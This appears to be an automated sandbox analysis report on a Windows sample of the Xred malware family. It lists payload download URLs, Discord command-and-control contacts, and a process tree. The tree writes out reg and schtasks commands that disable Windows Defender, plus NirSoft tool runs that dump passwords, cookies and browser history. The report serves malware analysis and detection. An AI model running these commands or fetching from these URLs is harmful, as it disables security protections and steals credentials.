Analysis
-
max time kernel
142s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-01-2025 00:10
Behavioral task
behavioral1
Sample
JaffaCakes118_032687d100b775f3693d581156e20456.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
JaffaCakes118_032687d100b775f3693d581156e20456.exe
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_032687d100b775f3693d581156e20456.exe
-
Size
3.6MB
-
MD5
032687d100b775f3693d581156e20456
-
SHA1
41deda7622b2300396f3d236c29df5f696bb4503
-
SHA256
a674a4a32f849cc121e6b872da5a793418de56a458e530b351a801ba6d6300f7
-
SHA512
b1222c235d062dcd108d65acba6b05f5aae768530de86aca2077dd7785b07cf57d48df8207675a3280f9b8e2c4c7bc4d288f927dc6d8d06b4c9d2afbc6304f83
-
SSDEEP
98304:Snsmtk2ajqXpy05Q0N1rsYSZ6BoXh1kkypSH3Oh5Bemg:cLT405QYtsTEB08T8HehLv
Malware Config
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Xred family
-
Detected Nirsoft tools 7 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/2012-200-0x0000024177E00000-0x0000024178142000-memory.dmp Nirsoft behavioral2/files/0x0008000000023bd5-254.dat Nirsoft behavioral2/files/0x0008000000023c07-263.dat Nirsoft behavioral2/files/0x0008000000023c08-265.dat Nirsoft behavioral2/files/0x0008000000023c05-258.dat Nirsoft behavioral2/memory/468-417-0x0000000000400000-0x000000000045B000-memory.dmp Nirsoft behavioral2/memory/1140-419-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/2012-200-0x0000024177E00000-0x0000024178142000-memory.dmp WebBrowserPassView behavioral2/files/0x0008000000023c08-265.dat WebBrowserPassView -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation JaffaCakes118_032687d100b775f3693d581156e20456.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation RtkBtManServ.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation Synaptics.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation ._cache_RtkBtManServ.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager4252497.exe JaffaCakes118_032687d100b775f3693d581156e20456.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager4252497.exe JaffaCakes118_032687d100b775f3693d581156e20456.exe -
Executes dropped EXE 10 IoCs
pid Process 452 RtkBtManServ.exe 2012 ._cache_RtkBtManServ.exe 4912 Synaptics.exe 184 ._cache_Synaptics.exe 1892 bfsvc.exe 1492 snuvcdsm.exe 468 winhlp32.exe 1140 splwow64.exe 4316 hh.exe 3184 xwizard.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" RtkBtManServ.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 39 discord.com 40 discord.com 41 discord.com 23 discord.com 24 discord.com 25 discord.com 37 discord.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 api64.ipify.org 20 api64.ipify.org 21 api64.ipify.org -
Modifies Security services 2 TTPs 4 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe -
resource yara_rule behavioral2/files/0x0008000000023bd6-256.dat upx behavioral2/files/0x0008000000023c06-261.dat upx behavioral2/memory/468-404-0x0000000000400000-0x000000000045B000-memory.dmp upx behavioral2/memory/1140-411-0x0000000000400000-0x000000000041B000-memory.dmp upx behavioral2/memory/468-417-0x0000000000400000-0x000000000045B000-memory.dmp upx behavioral2/memory/1140-419-0x0000000000400000-0x000000000041B000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language splwow64.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xwizard.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RtkBtManServ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bfsvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language snuvcdsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winhlp32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings JaffaCakes118_032687d100b775f3693d581156e20456.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RtkBtManServ.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings ._cache_RtkBtManServ.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4936 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 1492 snuvcdsm.exe 1492 snuvcdsm.exe 1492 snuvcdsm.exe 1492 snuvcdsm.exe 4316 hh.exe 4316 hh.exe 3184 xwizard.exe 3184 xwizard.exe 3184 xwizard.exe 3184 xwizard.exe 3184 xwizard.exe 3184 xwizard.exe 3184 xwizard.exe 3184 xwizard.exe 2012 ._cache_RtkBtManServ.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2012 ._cache_RtkBtManServ.exe Token: SeDebugPrivilege 184 ._cache_Synaptics.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 4936 EXCEL.EXE 4936 EXCEL.EXE 4936 EXCEL.EXE 4936 EXCEL.EXE 4936 EXCEL.EXE 4936 EXCEL.EXE 4936 EXCEL.EXE 4936 EXCEL.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4456 wrote to memory of 452 4456 JaffaCakes118_032687d100b775f3693d581156e20456.exe 85 PID 4456 wrote to memory of 452 4456 JaffaCakes118_032687d100b775f3693d581156e20456.exe 85 PID 4456 wrote to memory of 452 4456 JaffaCakes118_032687d100b775f3693d581156e20456.exe 85 PID 4456 wrote to memory of 2636 4456 JaffaCakes118_032687d100b775f3693d581156e20456.exe 86 PID 4456 wrote to memory of 2636 4456 JaffaCakes118_032687d100b775f3693d581156e20456.exe 86 PID 4456 wrote to memory of 2076 4456 JaffaCakes118_032687d100b775f3693d581156e20456.exe 88 PID 4456 wrote to memory of 2076 4456 JaffaCakes118_032687d100b775f3693d581156e20456.exe 88 PID 2636 wrote to memory of 1808 2636 cmd.exe 90 PID 2636 wrote to memory of 1808 2636 cmd.exe 90 PID 2076 wrote to memory of 1900 2076 cmd.exe 91 PID 2076 wrote to memory of 1900 2076 cmd.exe 91 PID 2636 wrote to memory of 3192 2636 cmd.exe 92 PID 2636 wrote to memory of 3192 2636 cmd.exe 92 PID 2636 wrote to memory of 5116 2636 cmd.exe 93 PID 2636 wrote to memory of 5116 2636 cmd.exe 93 PID 2636 wrote to memory of 2184 2636 cmd.exe 94 PID 2636 wrote to memory of 2184 2636 cmd.exe 94 PID 2636 wrote to memory of 3476 2636 cmd.exe 95 PID 2636 wrote to memory of 3476 2636 cmd.exe 95 PID 2636 wrote to memory of 1568 2636 cmd.exe 96 PID 2636 wrote to memory of 1568 2636 cmd.exe 96 PID 2636 wrote to memory of 2396 2636 cmd.exe 97 PID 2636 wrote to memory of 2396 2636 cmd.exe 97 PID 2636 wrote to memory of 4832 2636 cmd.exe 98 PID 2636 wrote to memory of 4832 2636 cmd.exe 98 PID 2636 wrote to memory of 4236 2636 cmd.exe 99 PID 2636 wrote to memory of 4236 2636 cmd.exe 99 PID 2636 wrote to memory of 4208 2636 cmd.exe 100 PID 2636 wrote to memory of 4208 2636 cmd.exe 100 PID 2636 wrote to memory of 4440 2636 cmd.exe 101 PID 2636 wrote to memory of 4440 2636 cmd.exe 101 PID 2636 wrote to memory of 3668 2636 cmd.exe 102 PID 2636 wrote to memory of 3668 2636 cmd.exe 102 PID 2636 wrote to memory of 4012 2636 cmd.exe 103 PID 2636 wrote to memory of 4012 2636 cmd.exe 103 PID 2636 wrote to memory of 4640 2636 cmd.exe 104 PID 2636 wrote to memory of 4640 2636 cmd.exe 104 PID 2636 wrote to memory of 2912 2636 cmd.exe 125 PID 2636 wrote to memory of 2912 2636 cmd.exe 125 PID 2636 wrote to memory of 3656 2636 cmd.exe 106 PID 2636 wrote to memory of 3656 2636 cmd.exe 106 PID 2636 wrote to memory of 392 2636 cmd.exe 107 PID 2636 wrote to memory of 392 2636 cmd.exe 107 PID 2636 wrote to memory of 468 2636 cmd.exe 108 PID 2636 wrote to memory of 468 2636 cmd.exe 108 PID 2636 wrote to memory of 736 2636 cmd.exe 109 PID 2636 wrote to memory of 736 2636 cmd.exe 109 PID 2636 wrote to memory of 1556 2636 cmd.exe 110 PID 2636 wrote to memory of 1556 2636 cmd.exe 110 PID 2636 wrote to memory of 3688 2636 cmd.exe 111 PID 2636 wrote to memory of 3688 2636 cmd.exe 111 PID 2636 wrote to memory of 3720 2636 cmd.exe 112 PID 2636 wrote to memory of 3720 2636 cmd.exe 112 PID 2636 wrote to memory of 3084 2636 cmd.exe 113 PID 2636 wrote to memory of 3084 2636 cmd.exe 113 PID 2636 wrote to memory of 916 2636 cmd.exe 114 PID 2636 wrote to memory of 916 2636 cmd.exe 114 PID 2636 wrote to memory of 3372 2636 cmd.exe 115 PID 2636 wrote to memory of 3372 2636 cmd.exe 115 PID 2636 wrote to memory of 404 2636 cmd.exe 116 PID 2636 wrote to memory of 404 2636 cmd.exe 116 PID 2636 wrote to memory of 4748 2636 cmd.exe 127 PID 2636 wrote to memory of 4748 2636 cmd.exe 127 PID 2636 wrote to memory of 4568 2636 cmd.exe 118 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_032687d100b775f3693d581156e20456.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_032687d100b775f3693d581156e20456.exe"1⤵
- Checks computer location settings
- Drops startup file
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4dZ/dz5UA2Tb+U/iGKkkMhRfjtyz9vomtAmiZ6v/tV+IYsjRx4+L2/5YGewvzjN62Wv5GoipVCSSXdg3i5Ozj1eysOh1VZunkSsbrAA0IhD6bSb45CB0b3wAxzgNcSXBY=2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:452 -
C:\Users\Admin\AppData\Local\Temp\._cache_RtkBtManServ.exe"C:\Users\Admin\AppData\Local\Temp\._cache_RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4dZ/dz5UA2Tb+U/iGKkkMhRfjtyz9vomtAmiZ6v/tV+IYsjRx4+L2/5YGewvzjN62Wv5GoipVCSSXdg3i5Ozj1eysOh1VZunkSsbrAA0IhD6bSb45CB0b3wAxzgNcSXBY=3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
- Checks computer location settings
PID:2112 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵PID:552
-
C:\Users\Admin\AppData\Local\Temp\bfsvc.exeC:\Users\Admin\AppData\Local\Temp\bfsvc.exe /capture /Filename "C:\Users\Admin\AppData\Local\Temp\capture.png"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1892
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
- Checks computer location settings
PID:3544 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵PID:4232
-
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exeC:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1492
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
- Checks computer location settings
PID:3168 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵PID:2612
-
C:\Users\Admin\AppData\Local\Temp\winhlp32.exeC:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:468
-
-
C:\Users\Admin\AppData\Local\Temp\splwow64.exeC:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1140
-
-
C:\Users\Admin\AppData\Local\Temp\hh.exeC:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4316
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
- Checks computer location settings
PID:2636 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵PID:5028
-
C:\Users\Admin\AppData\Local\Temp\xwizard.exeC:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3184
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\._cache_RtkBtManServ.exe"4⤵PID:3728
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵PID:1716
-
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4912 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:184
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵PID:1808
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:3192
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:5116
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:2184
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:3476
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1568
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2396
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4832
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4236
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:4208
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤3⤵PID:4440
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:3668
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:4012
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:4640
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:2912
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:3656
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:392
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:468
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:736
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:1556
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:3688
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:3720
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵PID:3084
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵PID:916
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵PID:3372
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
PID:404
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
PID:4748
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
PID:4568
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies Security services
PID:4072
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:3080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_032687d100b775f3693d581156e20456.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1900
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4936
-
C:\Windows\system32\BackgroundTaskHost.exe"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider1⤵PID:2912
-
C:\Windows\system32\BackgroundTaskHost.exe"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider1⤵PID:4748
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.8MB
MD588ab0bb59b0b20816a833ba91c1606d3
SHA172c09b7789a4bac8fee41227d101daed8437edeb
SHA256f4fb42c8312a6002a8783e2a1ab4571eb89e92cd192b1a21e8c4582205c37312
SHA51205cff2ca00ba940d9371c469bce6ffb4795c845d77525b8a1d4919f708296e66c0a6f3143c5964f5e963955e4f527a70624651113e72dc977f5ef40fa0276857
-
Filesize
22KB
MD5d29de36b8f7c7d17ff602e5e437144bd
SHA1bf0416f491404a7ec7bc66afb352e81c7bc3d3db
SHA2567ad0c62b38e63c2ec500739a6bc49a808bf4971189c61b74bacf6f8a90b8363e
SHA512eb5531ac3375501850b11de6aad89f37ed2b60ea01f0c99967b77dac8b7d4326f5fa7327c1640ff6e90b0214fc7e92058f82f2d7bd21025228a4d6066ed1d81d
-
Filesize
4KB
MD5bc25ccf39db8626dc249529bcc8c5639
SHA13e9cbdb20a0970a3c13719a2f289d210cdcc9e1d
SHA256b333f8c736c701bc826886f395d928731850cbce6db77be752b3cf7979114904
SHA5129a546127bddc1d187e674cda82e6c5046cac7f3e6f9515aed68d5bff2264b9d679d857dd97270e10826cd11ce2d92d82dd7f9801e19027e346b60bcc814cca1a
-
Filesize
17KB
MD5e566fc53051035e1e6fd0ed1823de0f9
SHA100bc96c48b98676ecd67e81a6f1d7754e4156044
SHA2568e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15
SHA512a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
17KB
MD5071ded32e6ebd305894d6a35440b549e
SHA1da340110beb752d0c92e416ddc78827acda7d8eb
SHA2565563cc6753171d09a1c77fda7f0bfdcc2a3af9f6cccdebaa165863eb739120a6
